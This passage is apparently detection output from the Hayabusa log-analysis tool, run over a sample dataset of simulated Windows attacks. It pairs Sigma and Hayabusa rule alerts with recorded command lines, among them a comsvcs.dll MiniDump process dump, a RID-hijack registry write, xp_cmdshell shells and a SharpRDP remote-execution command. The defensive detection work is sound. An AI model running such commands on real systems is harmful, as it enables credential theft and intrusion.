Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning 
Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.396 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.439 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt PID: 4868 | Tgt PGUID: 747F3D96-1C5C-5D69-0000-0010FEB71E00,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx +2019-09-01 21:04:22.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/smb_bi_auth_conn_spoolsample.evtx +2019-09-01 21:04:22.908 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:58.463 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 
+2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-06 22:49:35.433 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-06 22:49:39.823 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 747F3D96-3944-5D72-0000-001019773200,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-06 23:58:44.918 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-09 04:14:54.471 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,ResDev,Usage of Sysinternals 
Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential Prompt,,rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 
747F3D96-DB7C-5DBE-0000-0010CF6B9502",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 
url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 747F3D96-2842-5E1E-0000-00100C417A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,OpenURL ms-browser:// | Process: 
C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 747F3D96-28B3-5E1E-0000-00101DF17B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 747F3D96-28B3-5E1E-0000-001032047C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 747F3D96-2910-5E1E-0000-001053F57C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning 
Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 